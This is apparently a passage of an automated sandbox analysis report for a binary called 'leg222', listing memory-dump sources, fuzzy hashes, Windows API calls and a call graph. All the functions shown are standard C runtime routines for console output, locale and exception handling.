                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304673417.0000000000BB8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_aa0000_leg222.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2112829910-0
                                                                                                                                                                                                                                          • Opcode ID: 02c26e192665187fce7f6c7efbb582a495556bf5d7a0e410467f51f8d640c468
                                                                                                                                                                                                                                          • Instruction ID: 164b4e2118daf2c9b662240cce80117236c08daa67abe51d1e34c5557455f674
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 02c26e192665187fce7f6c7efbb582a495556bf5d7a0e410467f51f8d640c468
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 07D15975D002589FDF15CFA8D8809EDBBB9FF49314F18462AE856FB252D730A942CB60
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2304487503.0000000000AA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304467854.0000000000AA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304517289.0000000000ACA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304602444.0000000000AD5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304673417.0000000000BB8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_aa0000_leg222.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AdjustPointer
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1740715915-0
                                                                                                                                                                                                                                          • Opcode ID: 2bff6a4d4aedb83695eada4932ccd5eb9fb43a1f543f266eb96b8ff8ace212e7
                                                                                                                                                                                                                                          • Instruction ID: 9abb2005864c4926f56e793d8440e2d05f4df433152b6ca35aac2c64b571af59
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2bff6a4d4aedb83695eada4932ccd5eb9fb43a1f543f266eb96b8ff8ace212e7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BB510672600646AFDB29DF54D981B7AB7B8FF4A710F14452DE9164B2E1E732EC40CB90
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00ABF13E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00ABEEE7,?,00000000,-00000008), ref: 00ABF1EA
                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00ABF5BE
                                                                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 00ABF5C5
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?), ref: 00ABF5FF
                                                                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 00ABF606
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2304487503.0000000000AA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304467854.0000000000AA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304517289.0000000000ACA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304602444.0000000000AD5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304673417.0000000000BB8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_aa0000_leg222.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1913693674-0
                                                                                                                                                                                                                                          • Opcode ID: bfef7095090f9b1a0e2e7a2f78ce963f8a959bf0886fb30172e42f2c50bc1dc1
                                                                                                                                                                                                                                          • Instruction ID: e5ddae93d483164f563ffeb750817b25575a37098ffa6666a76ea77af18ef319
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bfef7095090f9b1a0e2e7a2f78ce963f8a959bf0886fb30172e42f2c50bc1dc1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7C21B071600245AFDF20AF769D809EAB7ACEF043647188539F929D7213D731ED109BA1
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2304487503.0000000000AA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304467854.0000000000AA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304517289.0000000000ACA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304602444.0000000000AD5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304673417.0000000000BB8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_aa0000_leg222.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: d99a2ce2da7174b513aee67ee4746e41d3680f31f63240761fc248f5adc0f6fa
                                                                                                                                                                                                                                          • Instruction ID: 6d5a57d01c9a6d3e07d108059bba137a36f635899e7ad8e7900a6014c2167a55
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d99a2ce2da7174b513aee67ee4746e41d3680f31f63240761fc248f5adc0f6fa
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F821AE71A04A05AFDB20AF71CD81BFAB7ADEF14364B108515F925D7142EB32ED108BA0
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetEnvironmentStringsW.KERNEL32 ref: 00AC04F8
                                                                                                                                                                                                                                            • Part of subcall function 00ABF13E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00ABEEE7,?,00000000,-00000008), ref: 00ABF1EA
                                                                                                                                                                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00AC0530
                                                                                                                                                                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00AC0550
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2304487503.0000000000AA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304467854.0000000000AA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304517289.0000000000ACA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304602444.0000000000AD5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304673417.0000000000BB8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_aa0000_leg222.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 158306478-0
                                                                                                                                                                                                                                          • Opcode ID: 2d0d33d014bb1311b7c26e3a5018997e9ed5b6e6df601d116cd80c85c3d4dd6b
                                                                                                                                                                                                                                          • Instruction ID: 9af890e74ac954516ff467ce385eb1397e9808f79fb0521a7f0deea279193bbb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2d0d33d014bb1311b7c26e3a5018997e9ed5b6e6df601d116cd80c85c3d4dd6b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B5112BF150120DFF6B1167B99D8DDBF2DACEE443D87124628F905D1101EE24CE028A71
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • WriteConsoleW.KERNEL32(00000010,00000000,00AD3A70,00000000,00000010,?,00AC4F42,00000010,00000001,00000010,?,?,00ABC233,?,00000010,00000000), ref: 00AC673D
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00AC4F42,00000010,00000001,00000010,?,?,00ABC233,?,00000010,00000000,?,?,?,00ABC7BA,00000010), ref: 00AC6749
                                                                                                                                                                                                                                            • Part of subcall function 00AC670F: CloseHandle.KERNEL32(FFFFFFFE,00AC6759,?,00AC4F42,00000010,00000001,00000010,?,?,00ABC233,?,00000010,00000000,?,?), ref: 00AC671F
                                                                                                                                                                                                                                          • ___initconout.LIBCMT ref: 00AC6759
                                                                                                                                                                                                                                            • Part of subcall function 00AC66D1: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00AC6700,00AC4F2F,?,?,00ABC233,?,00000010,00000000,?), ref: 00AC66E4
                                                                                                                                                                                                                                          • WriteConsoleW.KERNEL32(00000010,00000000,00AD3A70,00000000,?,00AC4F42,00000010,00000001,00000010,?,?,00ABC233,?,00000010,00000000,?), ref: 00AC676E
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2304487503.0000000000AA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304467854.0000000000AA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304517289.0000000000ACA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304602444.0000000000AD5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304673417.0000000000BB8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_aa0000_leg222.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2744216297-0
                                                                                                                                                                                                                                          • Opcode ID: 50e9c02b9f7d99f0ce1f4f4d443670938351ecf12d431f4bf5e0b3823c6aaf0c
                                                                                                                                                                                                                                          • Instruction ID: c4ea75392f7a4e7471d8feb64c2e0ad88519579cbd43bbfa3a00075679482dda
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 50e9c02b9f7d99f0ce1f4f4d443670938351ecf12d431f4bf5e0b3823c6aaf0c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E7F03936401128BBCF22AFE5DD08E9A7F26FF497A5F068515FE1995130DA328821DB91
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ___std_exception_copy.LIBVCRUNTIME ref: 00AA22CD
                                                                                                                                                                                                                                            • Part of subcall function 00AABCA0: RaiseException.KERNEL32(E06D7363,00000001,00000003,00AABBC3,?,?,?,?,00AABBC3,?,00AD40FC,?), ref: 00AABD00
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2304487503.0000000000AA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304467854.0000000000AA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304517289.0000000000ACA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304602444.0000000000AD5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304673417.0000000000BB8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_aa0000_leg222.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ExceptionRaise___std_exception_copy
                                                                                                                                                                                                                                          • String ID: ios_base::badbit set$ios_base::failbit set
                                                                                                                                                                                                                                          • API String ID: 3109751735-1240500531
                                                                                                                                                                                                                                          • Opcode ID: e7b41b0d6750de13a3d6bf6b6f150ad4c496a88b0a5927c271404153e4c0bfda
                                                                                                                                                                                                                                          • Instruction ID: 7f09eb9b83aa365c142828adc98922794a8f826118bbf22429f130f258d95377
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e7b41b0d6750de13a3d6bf6b6f150ad4c496a88b0a5927c271404153e4c0bfda
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DF41F4765043046FC304DF2CC841FAAB7E9EF9A310F14861EF9A587291E770E955CBA2
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 00AAE07F
                                                                                                                                                                                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 00AAE133
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2304487503.0000000000AA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304467854.0000000000AA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304517289.0000000000ACA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304602444.0000000000AD5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304673417.0000000000BB8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_aa0000_leg222.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                          • String ID: csm
                                                                                                                                                                                                                                          • API String ID: 3480331319-1018135373
                                                                                                                                                                                                                                          • Opcode ID: 5570ff4fe8a7c2230be08b960e5ffd1b0f8757a0c7d6fc02100ecae0e1c4b222
                                                                                                                                                                                                                                          • Instruction ID: 6b64a98a1f625efe863fe6306c3f1d0ed4f9e291e76bdcd26524df810902c105
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5570ff4fe8a7c2230be08b960e5ffd1b0f8757a0c7d6fc02100ecae0e1c4b222
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2A41D334E00218AFCF10DF68C885A9EBBB5FF46314F14856AE815AB3D2D771D905CB91
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • EncodePointer.KERNEL32(00000000,?), ref: 00AAE972
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2304487503.0000000000AA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304467854.0000000000AA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304517289.0000000000ACA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304602444.0000000000AD5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304673417.0000000000BB8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_aa0000_leg222.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: EncodePointer
                                                                                                                                                                                                                                          • String ID: MOC$RCC
                                                                                                                                                                                                                                          • API String ID: 2118026453-2084237596
                                                                                                                                                                                                                                          • Opcode ID: f26416db29b8a3f2dbcbc2fa827fee5621f87b61bccc8ec6da15b4812ca09f20
                                                                                                                                                                                                                                          • Instruction ID: 2e78b63d4e48ebfa3e3407fc3f7ff3f29b509ebfab84c1d2fed87c8b07a29dd9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f26416db29b8a3f2dbcbc2fa827fee5621f87b61bccc8ec6da15b4812ca09f20
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 24418B72900209EFCF16DF98CD81AEEBBB5FF4A300F188159F904A72A1D335AA51DB50
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00AA19B5
                                                                                                                                                                                                                                          • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00AA19FA
                                                                                                                                                                                                                                            • Part of subcall function 00AA9135: _Yarn.LIBCPMT ref: 00AA9154
                                                                                                                                                                                                                                            • Part of subcall function 00AA9135: _Yarn.LIBCPMT ref: 00AA9178
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2304487503.0000000000AA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304467854.0000000000AA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304517289.0000000000ACA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304602444.0000000000AD5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304673417.0000000000BB8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_aa0000_leg222.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                                                                                                                                                                                          • String ID: bad locale name
                                                                                                                                                                                                                                          • API String ID: 1908188788-1405518554
                                                                                                                                                                                                                                          • Opcode ID: 0167d34a8a1e07bc41bf59498b4fcb3991d6f463fb315376d2b7db6afe1300b3
                                                                                                                                                                                                                                          • Instruction ID: 75644a1ae8dc75e5a2554ba4113a81c44dcd9ad476e4f1b1cb660eb18681d6a4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0167d34a8a1e07bc41bf59498b4fcb3991d6f463fb315376d2b7db6afe1300b3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4EF0F961505B509ED3B0DF758905747BAE0AF26714F044E1ED4CA87A81E375E508CBA6

                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                          Execution Coverage:5.1%
                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                                                                                          Total number of Nodes:2000
                                                                                                                                                                                                                                          Total number of Limit Nodes:47
                                                                                                                                                                                                                                          execution_graph 21551 414b46 21552 414b52 __FrameHandler3::FrameUnwindToState 21551->21552 21563 40e0c6 EnterCriticalSection 21552->21563 21554 414b59 21564 41c915 21554->21564 21557 414b77 21588 414b9d 21557->21588 21563->21554 21565 41c921 __FrameHandler3::FrameUnwindToState 21564->21565 21566 41c94b 21565->21566 21567 41c92a 21565->21567 21591 40e0c6 EnterCriticalSection 21566->21591 21568 40e072 __Wcrtomb 14 API calls 21567->21568 21570 41c92f 21568->21570 21571 40df74 ___std_exception_copy 41 API calls 21570->21571 21572 414b68 21571->21572 21572->21557 21577 4149e0 GetStartupInfoW 21572->21577 21573 41c983 21592 41c9aa 21573->21592 21575 41c957 21575->21573 21576 41c865 __wsopen_s 15 API calls 21575->21576 21576->21575 21578 4149fd 21577->21578 21580 414a91 21577->21580 21579 41c915 42 API calls 21578->21579 21578->21580 21581 414a25 21579->21581 21583 414a96 21580->21583 21581->21580 21582 414a55 GetFileType 21581->21582 21582->21581 21584 414a9d 21583->21584 21585 414ae0 GetStdHandle 21584->21585 21586 414b42 21584->21586 21587 414af3 GetFileType 21584->21587 21585->21584 21586->21557 21587->21584 21596 40e10e LeaveCriticalSection 21588->21596 21590 414b88 21591->21575 21595 40e10e LeaveCriticalSection 21592->21595 21594 41c9b1 21594->21572 21595->21594 21596->21590 20072 40104e 20077 405abe 20072->20077 20074 401061 20081 4076cb 20074->20081 20078 405aca __EH_prolog3 20077->20078 20084 40641a 20078->20084 20080 405b26 std::locale::_Init 20080->20074 20148 40769e 20081->20148 20093 406039 20084->20093 20086 406425 20101 4049a0 20086->20101 20089 406452 20091 40645e 20089->20091 20105 406fef 20089->20105 20090 401f00 std::ios_base::_Init 43 API calls 20090->20089 20091->20080 20094 406045 __EH_prolog3 20093->20094 20095 401f00 std::ios_base::_Init 43 API calls 20094->20095 20096 406076 20095->20096 20097 40742e std::_Facet_Register 16 API calls 20096->20097 20098 40607d 20097->20098 20100 40608e std::locale::_Init 20098->20100 20110 4057aa 20098->20110 20100->20086 20102 4049b3 20101->20102 20103 404b20 72 API calls 20102->20103 20104 4049bd 20103->20104 20104->20089 20104->20090 20106 405474 std::_Lockit::_Lockit 7 API calls 20105->20106 20107 406fff 20106->20107 20108 4054cc std::_Lockit::~_Lockit 2 API calls 20107->20108 20109 40703d 20108->20109 20109->20091 20111 4057b6 __EH_prolog3 20110->20111 20112 405474 std::_Lockit::_Lockit 7 API calls 20111->20112 20113 4057c1 20112->20113 20114 4057f2 20113->20114 20122 40590f 20113->20122 20116 4054cc std::_Lockit::~_Lockit 2 API calls 20114->20116 20118 405832 std::locale::_Init 20116->20118 20117 4057d4 20128 405932 20117->20128 20118->20100 20121 405702 _Yarn 15 API calls 20121->20114 20123 40742e std::_Facet_Register 16 API calls 20122->20123 20124 40591a 20123->20124 20125 40592e 20124->20125 20132 40563e 20124->20132 20125->20117 20129 40593e 20128->20129 20131 4057dc 20128->20131 20135 406fc0 20129->20135 20131->20121 20133 405702 _Yarn 15 API calls 20132->20133 20134 405678 20133->20134 20134->20117 20136 406fd0 EncodePointer 20135->20136 20137 40e13c 20135->20137 20136->20131 20136->20137 20138 4174ae CallUnexpected 2 API calls 20137->20138 20139 40e141 20138->20139 20140 40e14c 20139->20140 20141 4174f3 CallUnexpected 41 API calls 20139->20141 20142 40e156 IsProcessorFeaturePresent 20140->20142 20147 40e175 20140->20147 20141->20140 20144 40e162 20142->20144 20143 411577 CallUnexpected 23 API calls 20145 40e17f 20143->20145 20146 40dd78 CallUnexpected 8 API calls 20144->20146 20146->20147 20147->20143 20149 4076b4 20148->20149 20150 4076ad 20148->20150 20157 413230 20149->20157 20154 4131b3 20150->20154 20153 40106b 20155 413230 44 API calls 20154->20155 20156 4131c5 20155->20156 20156->20153 20160 412f7c 20157->20160 20161 412f88 __FrameHandler3::FrameUnwindToState 20160->20161 20168 40e0c6 EnterCriticalSection 20161->20168 20163 412f96 20169 412fd7 20163->20169 20165 412fa3 20179 412fcb 20165->20179 20168->20163 20170 412ff2 20169->20170 20178 413065 std::_Lockit::_Lockit 20169->20178 20171 413045 20170->20171 20170->20178 20182 41ef6b 20170->20182 20172 41ef6b 44 API calls 20171->20172 20171->20178 20174 41305b 20172->20174 20176 4140f1 ___free_lconv_mon 14 API calls 20174->20176 20175 41303b 20177 4140f1 ___free_lconv_mon 14 API calls 20175->20177 20176->20178 20177->20171 20178->20165 20210 40e10e LeaveCriticalSection 20179->20210 20181 412fb4 20181->20153 20183 41ef93 20182->20183 20184 41ef78 20182->20184 20185 41efa2 20183->20185 20191 4239f1 20183->20191 20184->20183 20186 41ef84 20184->20186 20198 419c05 20185->20198 20188 40e072 __Wcrtomb 14 API calls 20186->20188 20190 41ef89 codecvt 20188->20190 20190->20175 20192 423a11 HeapSize 20191->20192 20193 4239fc 20191->20193 20192->20185 20194 40e072 __Wcrtomb 14 API calls 20193->20194 20195 423a01 20194->20195 20196 40df74 ___std_exception_copy 41 API calls 20195->20196 20197 423a0c 20196->20197 20197->20185 20199 419c12 20198->20199 20200 419c1d 20198->20200 20201 415426 std::_Locinfo::_Locinfo_ctor 15 API calls 20199->20201 20202 419c25 20200->20202 20209 419c2e __dosmaperr 20200->20209 20206 419c1a 20201->20206 20203 4140f1 ___free_lconv_mon 14 API calls 20202->20203 20203->20206 20204 419c33 20207 40e072 __Wcrtomb 14 API calls 20204->20207 20205 419c58 HeapReAlloc 20205->20206 20205->20209 20206->20190 20207->20206 20208 412e98 std::_Facet_Register 2 API calls 20208->20209 20209->20204 20209->20205 20209->20208 20210->20181 20292 406464 20296 406489 20292->20296 20297 406485 20292->20297 20293 407420 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 20294 4064f1 20293->20294 20296->20297 20298 40653f 20296->20298 20299 4064cd 20296->20299 20297->20293 20298->20297 20300 40dcfa 69 API calls 20298->20300 20299->20297 20301 4059eb 20299->20301 20300->20297 20304 40e7fb 20301->20304 20305 40e80e _Fputc 20304->20305 20310 40e5ff 20305->20310 20308 40bbd5 _Fputc 41 API calls 20309 4059f9 20308->20309 20309->20297 20311 40e60b __FrameHandler3::FrameUnwindToState 20310->20311 20312 40e612 20311->20312 20313 40e637 20311->20313 20314 40def7 _Fputc 41 API calls 20312->20314 20321 40bb65 EnterCriticalSection 20313->20321 20320 40e62d 20314->20320 20316 40e646 20322 40e6c3 20316->20322 20320->20308 20321->20316 20323 40e6fa 20322->20323 20343 40e6e8 _Fputc 20322->20343 20324 414bd2 _Ungetc 41 API calls 20323->20324 20325 40e701 20324->20325 20326 414bd2 _Ungetc 41 API calls 20325->20326 20330 40e729 20325->20330 20328 40e712 20326->20328 20327 407420 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 20329 40e657 20327->20329 20328->20330 20331 414bd2 _Ungetc 41 API calls 20328->20331 20344 40e687 20329->20344 20332 414bd2 _Ungetc 41 API calls 20330->20332 20330->20343 20333 40e71e 20331->20333 20334 40e75c 20332->20334 20335 414bd2 _Ungetc 41 API calls 20333->20335 20336 40e77f 20334->20336 20337 414bd2 _Ungetc 41 API calls 20334->20337 20335->20330 20339 41607a _Fputc 43 API calls 20336->20339 20336->20343 20338 40e768 20337->20338 20338->20336 20340 414bd2 _Ungetc 41 API calls 20338->20340 20339->20343 20341 40e774 20340->20341 20342 414bd2 _Ungetc 41 API calls 20341->20342 20342->20336 20343->20327 20347 40bb79 LeaveCriticalSection 20344->20347 20346 40e68d 20346->20320 20347->20346 21875 40657c 21876 406597 21875->21876 21878 4065a9 21876->21878 21879 405a08 21876->21879 21882 40ea6d 21879->21882 21883 40ea79 __FrameHandler3::FrameUnwindToState 21882->21883 21884 40ea80 21883->21884 21885 40ea97 21883->21885 21887 40e072 __Wcrtomb 14 API calls 21884->21887 21895 40bb65 EnterCriticalSection 21885->21895 21889 40ea85 21887->21889 21888 40eaa6 21896 40e9b7 21888->21896 21891 40df74 ___std_exception_copy 41 API calls 21889->21891 21892 405a1a 21891->21892 21892->21878 21893 40eab4 21910 40eae3 21893->21910 21895->21888 21897 40e9cd 21896->21897 21899 40ea57 _Ungetc 21896->21899 21898 40e9fb 21897->21898 21897->21899 21900 418105 _Ungetc 14 API calls 21897->21900 21898->21899 21901 414bd2 _Ungetc 41 API calls 21898->21901 21899->21893 21900->21898 21902 40ea0d 21901->21902 21903 414bd2 _Ungetc 41 API calls 21902->21903 21904 40ea30 21902->21904 21906 40ea19 21903->21906 21904->21899 21913 40e8aa 21904->21913 21906->21904 21907 414bd2 _Ungetc 41 API calls 21906->21907 21908 40ea25 21907->21908 21909 414bd2 _Ungetc 41 API calls 21908->21909 21909->21904 21932 40bb79 LeaveCriticalSection 21910->21932 21912 40eae9 21912->21892 21914 414bd2 _Ungetc 41 API calls 21913->21914 21915 40e8cd 21914->21915 21916 40e8f6 21915->21916 21917 414bd2 _Ungetc 41 API calls 21915->21917 21922 40e930 21916->21922 21926 4161e4 21916->21926 21918 40e8db 21917->21918 21918->21916 21920 414bd2 _Ungetc 41 API calls 21918->21920 21921 40e8e9 21920->21921 21923 414bd2 _Ungetc 41 API calls 21921->21923 21924 407420 